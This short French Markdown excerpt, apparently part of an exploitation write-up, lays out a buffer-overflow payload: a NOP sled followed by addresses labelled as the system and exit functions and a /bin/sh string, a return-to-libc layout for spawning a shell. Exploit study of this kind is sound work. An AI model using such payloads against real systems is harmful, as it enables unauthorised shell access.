<!-- vim: syntax=Markdown -->

Voici le détail du shellcode utilisé :
```shellcode
\x90\x90\x90\x90 ┐ nop
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 │
\x90\x90\x90\x90 ┘
\xd0\xae\xe6\xf7 ╴ system function
\x70\xeb\xe5\xf7 ╴ exit function
\xec\x97\xf8\xf7 ╴ /bin/sh
```
